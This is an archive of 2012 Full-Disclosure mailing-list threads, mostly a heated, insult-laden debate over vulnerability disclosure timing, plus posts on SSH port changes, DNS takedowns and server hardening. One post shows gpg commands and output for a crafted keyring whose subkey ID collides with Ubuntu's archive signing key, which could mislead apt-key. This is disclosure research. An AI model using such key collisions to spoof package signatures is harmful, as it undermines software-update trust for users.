I replied all; the statement was to Guninski alone. Even if I didn't this is a mailing list and grammar or spelling don't matter. Note I won't mention your use of proffering. Regardless, let's see if I understand you. You are saying one should not agree with someone who ascribes behavioral (our spelling) patterns to others based on their own character traits, yet you are telling him he cannot possibly agree. It's OK for you to tell him what he can or can't believe in, but it's not OK for me to voice my own opinion? How exactly does that make you any different than I? Did Georgi find some bugs in software that anyone could have found a decade ago? Sure. And good for him. My point was the WAY he went about working with the vendor and disclosing it. Defend him all you like, but no one was helped in those cases, and many many people were hurt. This isn't opinion, this is fact you can look up for yourself. Look at people like Michal Zalewski - he discovered god knows how many bugs in god knows how many browsers and he was professional about the whole thing. If you are actually arguing against the claim that disclosure is an ego-driven process (again, where purposefully and deliberately sought after) and are defending Georgi at the same time then all I can do is wish you luck with your life's perceptions. You are of course free to think what you want, how you want, and when you want - I'll just disagree with you. t On 7/10/12 3:40 PM, paul.sz...@sydney.edu.au paul.sz...@sydney.edu.au wrote: Dear Mikhail, From: Thor (Hammer of God) t...@hammerofgod.com To: Georgi Guninski gunin...@guninski.com, Stefan Kanthak stefan.kant...@nexgo.de Cc: full-disclosure@lists.grok.org.uk full-disclosure@lists.grok.org.uk I'm not contradicting myself at all - in fact, *you* are the exact type of person I'm talking about. You couldn't give a rat's ass about the industry or anyone but yourself. Nothing you have ever done has been valuable to anyone other than you; it has been completely self-serving egotistical bullshit. I completely agree with Thor. ... You cannot possibly agree with someone who addresses two people in the singular. You should not agree with someone who ascribes behaviourial patterns to others, based on his own character traits. Are you familiar with Georgi's work? Please look at his website before proffering opinions. Cheers, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] How much time is appropriate for fixing a bug?
I must not have articulated my point properly as it looks like we are both saying the same thing. What I was trying to convey was that if a person was actually concerned about the industry as opposed to self-promotion and ego-substantiation, then they would just notify the vendors and then get on with their lives irrespective of the vendors' ultimate remedy. As you say, there are any number of reasons why a vendor will or won't fix a bug, and/or when they will or won't fix it. The researcher will never know the requirements or considerations. In that respect, you have to trust the vendor - again, *IF* you are not concerned with self promotion. When a vendor fixes a bug, why do people then post details on their find once it is patched? For recognition. I'm not saying there's anything wrong with it - I've done it myself, purely for the reason of getting some acknowledgment. I was just commenting on the honesty of Joro's fuck 'em comment. I think any more on the subject will just result in another flare-up of FD vs RD vs FO vs GGF, so I'll probably not spend too much more time on the thread - but please feel free to add whatever you may think I've missedŠ. t On 7/8/12 5:07 AM, Stefan Kanthak stefan.kant...@nexgo.de wrote: Thor (Hammer of God) t...@hammerofgod.com wrote: | Content-Type: multipart/mixed; boundary0734760750== Please stop posting anything but text/plain. If you really care about the security of the industry, then submit it and be done with it. If and when they fix it is up to them. OUCH!? The industry will (typically) not fix any error if the cost for fixing exceeds the loss (or revenue) that this fix creates, including the vendors gain/loss of reputation, gain/loss of stock value, loss of money in court cases or due to compensations, loss of (future) sales due to (dis-)satisfied customers, ... Joe Average can't tell the difference between a program which is designed, developed, built and maintained according to the state of the art, and some piece of crap that is not. He but only sees the (nice or promising) GUI of the product and it's price tag. Stefan Kanthak ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] How much time is appropriate for fixing a bug?
I'm not contradicting myself at all - in fact, *you* are the exact type of person I'm talking about. You couldn't give a rat's ass about the industry or anyone but yourself. Nothing you have ever done has been valuable to anyone other than you; it has been completely self-serving egotistical bullshit. So you found a few bugs in Explorer. Wow! CongratulationsŠ I'm sure your mommy is proud of little Joro. *ANYONE* could have found bugs in Explorer, and they did - you just did in it a full-blow look at me manner that ended up hurting more people than it helped (because it didn't help anyone). I'm amazed that you didn't burst into flame from the hypocritical charge of buzzwords. For the last 10 years or more, you've been the poster child of M$, Exploder, Windoze and any other number of 12-year-old-mentality buzzwords. The actual *facts* here are that you've never published *any* code of consequence (not that I've found) nor have you published and written works of any value. I've never seen any evidence of an actual job you have, or references of work that has contributed to the industry in any way. Yet you are a bitter critical of people who write code, you belittle people who publish, and you present yourself as an expert on corporate culture. In other words Georgi, you are completely full of shit. So yes, I stand by my [obviously tongue-in-cheek] statement of people do things for two reasons, to get paid or to get laid. You probably get both, but my guess is it is sourced within the same myopic scope of your world views. t On 7/9/12 3:20 AM, Georgi Guninski gunin...@guninski.com wrote: On Sun, Jul 08, 2012 at 02:07:52PM +0200, Stefan Kanthak wrote: Thor (Hammer of God) t...@hammerofgod.com wrote: | Content-Type: multipart/mixed; boundary0734760750== Please stop posting anything but text/plain. If you really care about the security of the industry, then submit it and be done with it. If and when they fix it is up to them. OUCH!? The industry will (typically) not fix any error if the cost for fixing exceeds the loss (or revenue) that this fix creates, including the vendors gain/loss of reputation, gain/loss of stock value, loss of money in court cases or due to compensations, loss of (future) sales due to (dis-)satisfied customers, ... Joe Average can't tell the difference between a program which is designed, developed, built and maintained according to the state of the art, and some piece of crap that is not. He but only sees the (nice or promising) GUI of the product and it's price tag. Stefan Kanthak i agree that Thor is writing pure corporate crap. note that he is contradicting himself: in another thread he wrote basically people do stuff for money and getting laid. in this thread he is using the buzzwords self promotion/ ego-substantiation which don't appear to fit the above model of motivation and are certainly wrong for most members of FD. probably in the next thread he will use the buzzword irresponsible. i suppose in his glass house world he expects hackers to give the 0days to vendors and keep silent, busting vendors profits for free so they don't accused of the ego related irresponsible crimes. f*ck it, i expect the final usa crisis to partially fix the model. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Preferred OSX Security/Server Lists
Greets all. I was hoping to get some opinions on your favorite OSX security/server admin sites/lists. I'm converting the HoG internal and production networks over to OSX and OSX Server and would like some pre-vetting suggestions for a decent source of information. Thanks much. t ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] How much time is appropriate for fixing a bug?
there is time for fixing and there is time for breaking Ecclesiastes in the Hacker's Bible? :0 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] How much time is appropriate for fixing a bug?
Well, I have to say, at least he's being honest. If the guy is chomping at the bit to release the info so he can get some attention, then let him. That, of course, is what it is all about. He's not releasing the info so that the community can be safe by forcing the vendor to fix it. He's doing it so people can see how smart he is and that he found some bug. So Joro's reply of fuck em is actually refreshingly honest. Regarding how long does it take, it is completely impossible to tell. If someone fixed it in 10 minutes, good for them. It could take someone else 10 months. Any time I see things like Wikipedia advising things like 5 months I have to lol. They have no freaking idea whatsoever as to the company's dev processes and the extend that the fix could impact legacy code or any number of other factors. I would actually have expected code bug-finders to have a better clue about these things, but apparently they don't. MSFT's process is nuts – they have SO many dependancies, so many different products with shared code, so many legacy products, so many vendors with drivers and all manner of other stuff that the process is actually quite difficult and time consuming. Oracle is worse – they have the same but multiplied by x platforms. Apple I think has it the easiest of the big ones, but even OSX is massively complex (and completely awesome). It is all about intent: if you want to be recognized publicly for some fame or whatever, just FD it because chances are you will anyway. If you really care about the security of the industry, then submit it and be done with it. If and when they fix it is up to them. t From: Gary Baribault g...@baribault.netmailto:g...@baribault.net Date: Friday, July 6, 2012 7:59 AM To: full-disclosure@lists.grok.org.ukmailto:full-disclosure@lists.grok.org.uk full-disclosure@lists.grok.org.ukmailto:full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] How much time is appropriate for fixing a bug? Hey Georgi, Didn't take your happy pill this morning? I would say that the answer depends on how the owner/company answers you, if you feel that their stringing you along and you have given them some time, then warn them that your publishing, give them 24 hours and then go for it. Obviously it depends on the bug and the software, I major bug in a large program will take longer, and so long as they are talking to you, and you don't miss your morning happy pill, you can wait, a small bug in a small program shouldn't take as long. There is no one answer to your question, if you are having an interactive discussion with them, then be patient, otherwise, Georgi's answer is a good one if they are ignoring you or stringing you along. Gary B On 07/06/2012 10:33 AM, Georgi Guninski wrote: On Wed, Jul 04, 2012 at 10:49:18PM +0200, Jann Horn wrote: After having reported a security-relevant bug about a smartphone, how long would you wait for the vendor to fix it? What are typical times? I remember telling someone about a security-relevant bug in his library some time ago - he fixed it and published the fixed version within ten minutes. On the other hand, I often see mails on bugtraq or so in which the given dates show that the vendor took maybe a year or so to fix the issue... when i was young i asked a similar question. if you ask me now, the short answer is fuck them, if you are killing a bug the time is completely up to you. responsible disclosure is just a buzzword (the RFC on it failed). you have bugs, they don't have. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] How much time is appropriate for fixing a bug?
I already covered that – if they don't fix it, the publish it. Also, if a vendor has a venerability to the community, then they would obviously fix it. There's no responsibility to disclose anything. FD doesn't exist to satisfy some requirement for researchers to publish vulnerability – it exists so that people can market themselves. The we must disclose this so that people will know and they can protect themselves is simply a justification for the aforementioned.These people don't give a fat fuck about the industry or protecting other people. If they did, they would just post hey, there's a vuln in this product, email me and I'll tell you about it. When no-one emails them (because this limited audience doesn't care) they don't get their deserved cred and post it. Nobody cares, and nobody remembers… his FD will simply be another tit in the peep show. People like 0DayInit and Litchfield did it the SMART way. They have a client base who have purchased a product to protect them from these vulnerabilities. People who purchase the product are protected in the meantime, as the vuln is actually addressed in the product. It actually works in their favor of the vendor to take longer as it makes the product more valuable. Vendors want responsible disclosure so they can assign priority to plan release cadence. Disclosures want recognition, or payment, or both. Each will do what is in their own best interest. But let's not pretend it is anything other than what it is. t From: Peter Dawson slash...@gmail.commailto:slash...@gmail.com Date: Friday, July 6, 2012 10:24 AM To: Timothy Mullen t...@hammerofgod.commailto:t...@hammerofgod.com Cc: full-disclosure@lists.grok.org.ukmailto:full-disclosure@lists.grok.org.uk full-disclosure@lists.grok.org.ukmailto:full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] How much time is appropriate for fixing a bug? Thor (Hammer of God) : If and when they fix it is up to them. so if vendor don't fix it /ack the bug.. then what ?? Responsibility works both ways.. Advise the vendor.. if they say fuck it.. I say fuck u.. and will advise the community ! There is a responsibility to disclose a venerability to the community so that they can take down/block /deactivate a service . .All that is necessary for the triumph of evil is that good men do nothing. -whoever ..fuck it ! /pd On Fri, Jul 6, 2012 at 12:46 PM, Thor (Hammer of God) t...@hammerofgod.commailto:t...@hammerofgod.com wrote: Well, I have to say, at least he's being honest. If the guy is chomping at the bit to release the info so he can get some attention, then let him. That, of course, is what it is all about. He's not releasing the info so that the community can be safe by forcing the vendor to fix it. He's doing it so people can see how smart he is and that he found some bug. So Joro's reply of fuck em is actually refreshingly honest. Regarding how long does it take, it is completely impossible to tell. If someone fixed it in 10 minutes, good for them. It could take someone else 10 months. Any time I see things like Wikipedia advising things like 5 months I have to lol. They have no freaking idea whatsoever as to the company's dev processes and the extend that the fix could impact legacy code or any number of other factors. I would actually have expected code bug-finders to have a better clue about these things, but apparently they don't. MSFT's process is nuts – they have SO many dependancies, so many different products with shared code, so many legacy products, so many vendors with drivers and all manner of other stuff that the process is actually quite difficult and time consuming. Oracle is worse – they have the same but multiplied by x platforms. Apple I think has it the easiest of the big ones, but even OSX is massively complex (and completely awesome). It is all about intent: if you want to be recognized publicly for some fame or whatever, just FD it because chances are you will anyway. If you really care about the security of the industry, then submit it and be done with it. If and when they fix it is up to them. t From: Gary Baribault g...@baribault.netmailto:g...@baribault.net Date: Friday, July 6, 2012 7:59 AM To: full-disclosure@lists.grok.org.ukmailto:full-disclosure@lists.grok.org.uk full-disclosure@lists.grok.org.ukmailto:full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] How much time is appropriate for fixing a bug? Hey Georgi, Didn't take your happy pill this morning? I would say that the answer depends on how the owner/company answers you, if you feel that their stringing you along and you have given them some time, then warn them that your publishing, give them 24 hours and then go for it. Obviously it depends on the bug and the software, I major bug in a large program will take longer, and so long as they are talking to you, and you don't miss your morning
Re: [Full-disclosure] How to access your favorite sites in the event of a DNS takedown ?
I think he was referring to a DNS blockade ala SOPA. Though the suggestion was painfully obvious (and that I pointed out the HOSTS file a few days back) it does show the level of complete ignorance on the part of any legislator who thinks a DNS blockade will, in any way, affect access to pirate sites. Of course, we all know it is simply record industry lobbying to make the government pay to enforce copyright infringement so that they don't have to. It really is quite a nice scam on their part: don't invest in any real DRM, and make someone else pay to enforce your IP. Nice. Timothy Thor Mullen www.hammerofgod.com Thor's Microsoft Security Bible -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Michael Stummvoll Sent: Wednesday, June 27, 2012 4:24 AM To: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] How to access your favorite sites in the event of a DNS takedown ? Hi, Do you know? Even in DNS take down you can youcan access your favourite sites. The More interesting question is: how possible is a complete DNS takedown? I don't feel that this is a real danger to the internet. From technical Site, DNS is decentral. All the Rootservers are designed to handle a fail/takedown of 2/3 of the dns-servers. From the political Site, the current public DNS is controlled by the ICANN and so (theoretical) by the USA. But I think, if they would abuse their force too much, this just would bring more people to alternatives like OpenNIC. Kind Regards, Michael ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] server security
Well, even if they are trying to get into your network specifically, you make them do more work. They have to scan *and* identify the services. The more scanning, fingerprinting, posting, peeking and poking they do (see what I did there? :) ) the louder they are and the more likely the attack is to be detected. This particular subject continues to come up, and there continues to be debate about the value, but I actually don't see how it can't be viewed as a security control, albeit a relatively trivial one to bypass. Security in depth works. Timothy Thor Mullen www.hammerofgod.com Thor's Microsoft Security Bible -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Daniel Hadfield Sent: Thursday, June 21, 2012 12:49 PM To: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] server security It depends what the attackers motive is. Is he/she trying to get as many machines infected as he/she can. Or is he/she trying to get into YOUR network. My 2c On 21/06/2012 20:20, Thor (Hammer of God) wrote: I completely agree with Gage. The way I see it, security through obscurity is perfectly valid as long as the control remains obscured. I think the anyone can just scan your ports is somewhat specious in that most (if not something like 99% or so (unqualified opinion of course)) traffic is simply noise and scans for standard ports. This is particularly true when it matters most: during a worm outbreak or a newly published vulnerability. Attackers simply don't have the time nor the inclination to go through and perform slow and loud scans when they can quickly move on to the next target. If 90% of the targets have services on the default ports, then it makes far more sense to just go after the easily targets. Perfect case-in-point is the recent RDP unpleasantness. Non-standard port deployments were automatically removed from the target scans for 3389. I don't see how any can argue against the security value of such a configuration. t Timothy Thor Mullen www.hammerofgod.com Thor's Microsoft Security Bible -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Gage Bystrom Sent: Thursday, June 21, 2012 9:25 AM To: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] server security Well thats a bit of an iffy one. I'd say it IS a security measure, albeit one that is solely effective if and only if compounded with other measures. It's unlikely, but you never know, you just might miss out on a nasty worm all because you werent running on a default port one day. On Thu, Jun 21, 2012 at 8:52 AM, Rob sy...@synfulvisions.com wrote: We need to make a distinction between security and obscurity here. The only time changing ports actually hardens a service in any way is when the port requires elevated rights to bind, changing to 1025 for example removes the root requirement. Any actual or theoretical vulnerabilities still exist. If somebody is looking at your server, they'll find the port without much trouble. Alternate ports can remove junk traffic from logs, so there is a benefit, if not entirely a security one. Rob Sent on the Sprint® Now Network from my BlackBerry® -Original Message- From: Alex Dolan dolan.a...@gmail.com Sender: listbou...@securityfocus.com Date: Thu, 21 Jun 2012 07:44:57 To: Littlefield, Tylerty...@tysdomain.com Cc: security-bas...@securityfocus.com Subject: Re: server security One tip I have is to set SSH to a port other than 22, I don't need to tell anyone how devastating it is if someone did actually get access to that service. Putting it on some other port reduces your risk On Thu, Jun 21, 2012 at 1:27 AM, Littlefield, Tyler ty...@tysdomain.com wrote: Hello: I have a couple questions. First, I'll explain what I did: I set up iptables and removed all unwanted services. Iptables blocks everything, then only opens what it wants. I also use the addrtype module to limit broadcast and unspec addresses, etc. I also do some malformed packet work where I just drop everything that looks malformed (mainly by the flags). 2) I secured ssh: blocked root logins, set it up so only users in the sshusers group can connect, and set it only to allow ppk. 3) I installed aid. 4) disabled malformed packets and forwarding/etc in sysctl. This is a basic web server that runs email, web and a couple other things. It's only running on a linode512, so I don't have the ability to set up a ton of stuff; I also think that would make things more of a mess. What else would be recommended? Also, I'm looking to add something to the web server; sometimes I notice that there are a lot of requests from people scanning for common urls like wordpress/phpbb3/etc, what kind of preventative measures
Re: [Full-disclosure] How to access your favorite sites in the event of a DNS takedown ?
What, no one uses the HOSTS file anymore? [Description: Description: Description: Description: Description: Description: Description: Description: Description: TimSig] Timothy Thor Mullen www.hammerofgod.com Thor's Microsoft Security Biblehttp://www.amazon.com/Thors-Microsoft-Security-Bible-Collection/dp/1597495727 From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Nate Theis Sent: Monday, June 25, 2012 12:28 PM To: jweyr...@gmail.com Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] How to access your favorite sites in the event of a DNS takedown ? And don't forget lists.grok.org.ukhttp://lists.grok.org.uk 127.0.0.1 On Jun 25, 2012 11:15 AM, Jardel jweyr...@gmail.commailto:jweyr...@gmail.com wrote: Do you know? Even in DNS take down you can youcan access your favourite sites. People may think that in DNS shoutdown they can lost access to their addicted websites. But after reading this article you will know how easily you can access your websites. You can access them by typing their IP address in your web-browser. Copy the IP addresses given below: tumblr.comhttp://tumblr.com 174.121.194.34 wikipedia.orghttp://wikipedia.org 208.80.152.201 Original Article:http://cybermughal.blogspot.com/2012/06/how-to-access-your-favorite-sites-in.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ inline: image001.png___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Sunday Fodder
For the FB'ers out there, the Hacker News (arguably accurate) has posted an incendiary photo alleging US soldier posing with the dead and supposedly engaged in The Ichabod. The funny part of it is to go through and count the number of posts that threaten the lives of Americans; each one of these poor sods' accounts are going to have their full history dumped, stored, and analyzed. Though they didn't do it on purpose, it is a very good example of how to socially manipulate behavior. https://www.facebook.com/thehackernews [Description: Description: Description: Description: Description: Description: Description: Description: Description: TimSig] Timothy Thor Mullen www.hammerofgod.com Security isn't about thinking outside the box. It's about not thinking yourself into it. Thor's Microsoft Security Biblehttp://www.amazon.com/Thors-Microsoft-Security-Bible-Collection/dp/1597495727 [Description: Description: Description: Description: TMSB-Prod-small] inline: image001.pnginline: image002.jpg___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Sunday Fodder
Hey, this clearly paid off!!! http://www.bbc.co.uk/news/technology-16810312 LOL Timothy “Thor” Mullen www.hammerofgod.com Thor’s Microsoft Security Bible -Original Message- From: Darius Jahandarie [mailto:djahanda...@gmail.com] Sent: Sunday, June 24, 2012 1:15 PM To: Thor (Hammer of God) Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Sunday Fodder On Sun, Jun 24, 2012 at 4:06 PM, Thor (Hammer of God) t...@hammerofgod.com wrote: For the FB’ers out there, the “Hacker News” (arguably accurate) has posted an incendiary photo alleging US soldier posing with the dead and supposedly engaged in “The Ichabod.” The funny part of it is to go through and count the number of posts that threaten the lives of Americans; each one of these poor sods’ accounts are going to have their full history dumped, stored, and analyzed. Hey, if the US government realizes this sort of pre-attack investigation stuff works better than their security theater at the airports, maybe my day-to-day life will improve. -- Darius Jahandarie ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] server security
I completely agree with Gage. The way I see it, security through obscurity is perfectly valid as long as the control remains obscured. I think the anyone can just scan your ports is somewhat specious in that most (if not something like 99% or so (unqualified opinion of course)) traffic is simply noise and scans for standard ports. This is particularly true when it matters most: during a worm outbreak or a newly published vulnerability. Attackers simply don't have the time nor the inclination to go through and perform slow and loud scans when they can quickly move on to the next target. If 90% of the targets have services on the default ports, then it makes far more sense to just go after the easily targets. Perfect case-in-point is the recent RDP unpleasantness. Non-standard port deployments were automatically removed from the target scans for 3389. I don't see how any can argue against the security value of such a configuration. t Timothy Thor Mullen www.hammerofgod.com Thor's Microsoft Security Bible -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Gage Bystrom Sent: Thursday, June 21, 2012 9:25 AM To: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] server security Well thats a bit of an iffy one. I'd say it IS a security measure, albeit one that is solely effective if and only if compounded with other measures. It's unlikely, but you never know, you just might miss out on a nasty worm all because you werent running on a default port one day. On Thu, Jun 21, 2012 at 8:52 AM, Rob sy...@synfulvisions.com wrote: We need to make a distinction between security and obscurity here. The only time changing ports actually hardens a service in any way is when the port requires elevated rights to bind, changing to 1025 for example removes the root requirement. Any actual or theoretical vulnerabilities still exist. If somebody is looking at your server, they'll find the port without much trouble. Alternate ports can remove junk traffic from logs, so there is a benefit, if not entirely a security one. Rob Sent on the Sprint® Now Network from my BlackBerry® -Original Message- From: Alex Dolan dolan.a...@gmail.com Sender: listbou...@securityfocus.com Date: Thu, 21 Jun 2012 07:44:57 To: Littlefield, Tylerty...@tysdomain.com Cc: security-bas...@securityfocus.com Subject: Re: server security One tip I have is to set SSH to a port other than 22, I don't need to tell anyone how devastating it is if someone did actually get access to that service. Putting it on some other port reduces your risk On Thu, Jun 21, 2012 at 1:27 AM, Littlefield, Tyler ty...@tysdomain.com wrote: Hello: I have a couple questions. First, I'll explain what I did: I set up iptables and removed all unwanted services. Iptables blocks everything, then only opens what it wants. I also use the addrtype module to limit broadcast and unspec addresses, etc. I also do some malformed packet work where I just drop everything that looks malformed (mainly by the flags). 2) I secured ssh: blocked root logins, set it up so only users in the sshusers group can connect, and set it only to allow ppk. 3) I installed aid. 4) disabled malformed packets and forwarding/etc in sysctl. This is a basic web server that runs email, web and a couple other things. It's only running on a linode512, so I don't have the ability to set up a ton of stuff; I also think that would make things more of a mess. What else would be recommended? Also, I'm looking to add something to the web server; sometimes I notice that there are a lot of requests from people scanning for common urls like wordpress/phpbb3/etc, what kind of preventative measures exist for this? -- Take care, Ty http://tds-solutions.net The aspen project: a barebones light-weight mud engine: http://code.google.com/p/aspenmud He that will not reason is a bigot; he that cannot reason is a fool; he that dares not reason is a slave. - --- Securing Apache Web Server with thawte Digital Certificate In this guide we examine the importance of Apache-SSL and who needs an SSL certificate. We look at how SSL works, how it benefits your company and how your customers can tell if a site is secure. You will find out how to test, purchase, install and use a thawte Digital Certificate on your Apache web server. Throughout, best practices for set-up are highlighted to help you ensure efficient ongoing management of your encryption keys and digital certificates. http://www.dinclinx.com/Redirect.aspx?36;4175;25;1371;0;5;946;e13b6be 442f727d1 - --- -- -- Securing Apache Web Server with thawte
Re: [Full-disclosure] www.LEORAT.com is scam
Hey man, that's some serious shit there - it's not a letter, it's a legal letter. Those are more letter than the normal letter. Be afraid! t Timothy Thor Mullen www.hammerofgod.com Thor's Microsoft Security Bible -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of coderman Sent: Tuesday, June 19, 2012 2:36 AM To: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] www.LEORAT.com is scam On Tue, Jun 19, 2012 at 2:05 AM, Fyodor fyo...@insecure.org wrote: From: Leo Impact Security,Inc cont...@leoimpact.com To: fyo...@insecure.org Subject: subject: http://seclists.org/fulldisclosure/2012/Apr/19 removing ... I am Mark, CISO of Leo Impact Security, some fraud person post illigmate post so please remove asap else we hire a lawer to send legal letter on your site. is this how n3td3v is paying for intarwebs? :o ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Using second gpg keyring may be misleading?
Ah... Very interesting. Another example where default trust can be a bad thing (as we saw with Flame). Sent from my iPad On Jun 15, 2012, at 6:43 AM, Georgi Guninski gunin...@guninski.com wrote: On Thu, Jun 14, 2012 at 05:52:26PM +, Thor (Hammer of God) wrote: What are you considering exploitable? The untrusted/unverified Master key? ubuntu fixed this out of paranoia: https://lists.ubuntu.com/archives/ubuntu-security-announce/2012-June/001721.html While it appears that a man-in-the-middle attacker cannot exploit this, as a hardening measure this update adjusts apt-key to validate all subkeys when checking for key collisions. i would suppose this was exploitable while it was alive. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] free speech - 9 yro bloggers are dangerous
As if haggis wasn't distressing enough... Sent from my iPad On Jun 15, 2012, at 5:00 AM, Georgi Guninski gunin...@guninski.com wrote: http://www.theregister.co.uk/2012/06/15/nine_year_old_school_dinner_blog_inaccurate/ Scots council: 9-yr-old lunch blogger was causing 'distress and harm' A Scottish council have said that a nine-year-old food blogger was misrepresenting her school dinners and distressing the canteen staff, by publishing a photoblog about her lunch. the blog is at: http://neverseconds.blogspot.co.uk/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Using second gpg keyring may be misleading?
What are you considering exploitable? The untrusted/unverified Master key? Timothy Thor Mullen www.hammerofgod.com Thor's Microsoft Security Bible -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Georgi Guninski Sent: Thursday, June 14, 2012 7:18 AM To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] Using second gpg keyring may be misleading? There is chance someone exploits this in apt-key... Attached is a keyring and here is the output: $rm -rf /home/joro2/.gnupg/ ; gpg --import /usr/share/keyrings/ubuntu-master-keyring.gpg ; gpg --check-sigs --keyring /tmp/sec3 gpg: imported: 1 (RSA: 1) gpg: no ultimately trusted keys found /home/joro2/.gnupg/pubring.gpg -- pub 4096R/3F272F5B 2007-11-09 uid Ubuntu Archive Master Signing Key ftpmas...@ubuntu.com sig!33F272F5B 2007-11-09 Ubuntu Archive Master Signing Key ftpmas...@ubuntu.com /tmp/sec3 - pub 1024R/B1C08810 2012-06-14 uid kkk5 k@k sig!3B1C08810 2012-06-14 [User ID not found] sig! 3F272F5B 2012-06-14 Ubuntu Archive Master Signing Key ftpmas...@ubuntu.com sig! 3F272F5B 2012-06-14 Ubuntu Archive Master Signing Key ftpmas...@ubuntu.com sub 1024R/0354AE88 2012-06-14 sig! B1C08810 2012-06-14 [User ID not found] sub 2179R/3F272F5B 2012-06-14 sig! B1C08810 2012-06-14 [User ID not found] 1 signature not checked due to a missing key $rm -rf /home/joro2/.gnupg/ ; gpg --import /usr/share/keyrings/ubuntu-master-keyring.gpg ; gpg --no-default-keyring --check-sigs --keyring /tmp/sec3 gpg: Total number processed: 1 gpg: imported: 1 (RSA: 1) gpg: no ultimately trusted keys found /tmp/sec3 - pub 1024R/B1C08810 2012-06-14 uid kkk5 k@k sig!3B1C08810 2012-06-14 kkk5 k@k sig! 3F272F5B 2012-06-14 kkk5 k@k sig! 3F272F5B 2012-06-14 kkk5 k@k sub 1024R/0354AE88 2012-06-14 sig! B1C08810 2012-06-14 kkk5 k@k sub 2179R/3F272F5B 2012-06-14 sig! B1C08810 2012-06-14 kkk5 k@k ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks Against Iran
And not capitalizing Army when you claim to have spent 10 years of your life in service does precisely the same thing. On Jun 10, 2012, at 3:31 AM, Laurelai laure...@oneechan.orgmailto:laure...@oneechan.org wrote: I dont listen to either. And sorry to burst your bubble but I did serve 10 years in the army. Next I imagine you will insult my gender identity or something equally silly. For the record you should capitalize the first word of each sentence and put a punctuation mark at the end, not doing this just makes you look uneducated and ensures people do not take you seriously. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
